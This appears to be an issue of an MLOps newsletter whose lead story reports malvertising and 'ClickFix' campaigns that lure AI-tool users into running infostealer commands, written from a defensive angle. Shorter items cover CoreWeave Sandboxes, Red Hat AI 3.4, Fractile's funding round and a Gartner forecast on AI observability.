Issue No. 08 • May 26, 2026
Gradient Brief
MLOps & AI Infrastructure — for the engineers building it
AI Developers Under Fire: Malvertising Campaigns Exploit AI Hype
A sophisticated wave of malvertising is actively targeting developers and users of AI tools. Over the past year, security researchers have documented at least 20 distinct malware campaigns exploiting the AI ecosystem. Attackers are using paid Google Ads, SEO poisoning, and fake extensions to distribute infostealers like AMOS and Amatera, specifically targeting users of Claude, ChatGPT, Grok, and DeepSeek.
The attack vectors have evolved from simple fake websites to exploiting the trusted domains of the AI platforms themselves. In a particularly insidious technique known as "ClickFix," attackers buy Google Ads that direct users to publicly shared, user-generated conversations hosted on legitimate domains like chatgpt.com or claude.ai. These carefully curated chats masquerade as official installation guides, tricking victims into pasting obfuscated Terminal commands that silently download and execute macOS infostealers without triggering standard security warnings.
macOS users are disproportionately targeted in these campaigns, as AI and vibe coding tool users skew heavily toward Mac environments and often possess high-value credentials, such as SSH keys, AWS tokens, and cryptocurrency wallets. In one notable campaign targeting Claude Code, attackers created a pixel-perfect replica of Anthropic's documentation hosted on a Squarespace subdomain, instructing users to run malicious terminal commands. For infrastructure teams, the takeaway is clear: developer environments are under siege, and traditional network controls are failing to catch these social engineering tactics. Organizations must enforce strict policies against running unverified terminal commands and implement robust endpoint monitoring.
Tool of the Week: CoreWeave Sandboxes
Commercial | On-Cluster or Serverless | CoreWeave
A unified execution layer that provides secure, isolated environments specifically designed for running reinforcement learning (RL), agent tool use, and model evaluation workflows.
As AI systems evolve to take actions, training requires more than just compute. RL and evaluation workflows require isolated environments that can run code safely, maintain state across steps, and scale massively. CoreWeave Sandboxes solves this by running directly within a customer's CoreWeave Kubernetes Service (CKS) cluster, or as a serverless runtime through Weights & Biases (W&B).
The platform is built for massive concurrency. IBM Research reported spinning up thousands of sandboxes in parallel per training step for their RL workflows, each with its own container image and resource boundaries. For the serverless option, sandbox activity is captured directly in the same W&B run view as training metrics, allowing teams to debug in context rather than across disconnected tools.
Quick Hits
- Red Hat AI 3.4 Ships AgentOps Stack Red Hat announced Red Hat AI 3.4, a "metal-to-agent" platform that tackles the operational friction of moving autonomous agents to production. It features a new Model-as-a-Service (MaaS) layer, vLLM upgrades supporting request prioritization, and a robust AgentOps framework with SPIFFE/SPIRE identity management and an MCP server catalog for governed tool access.
- Fractile Raises $220M for In-Memory Inference Chip The UK-based startup closed a Series B led by Accel to take its SRAM-based inference chip to production. Fractile's architecture performs matrix multiplications inside SRAM cells alongside compute logic, removing the DRAM bottleneck. The company claims this approach can run frontier models 25 times faster at one-tenth the cost of current GPU setups.
- Gartner Predicts 40% AI Observability Adoption by 2028 A new Gartner report projects that 40% of organizations deploying AI will implement dedicated AI observability tools within four years. The firm cited the growing need for predictive issue detection and the inability of traditional software monitoring to trace opaque deep learning models and agentic AI logic.
Gradient Brief is published for ML engineers, data scientists, and technical founders. Forward to a colleague who should be reading this.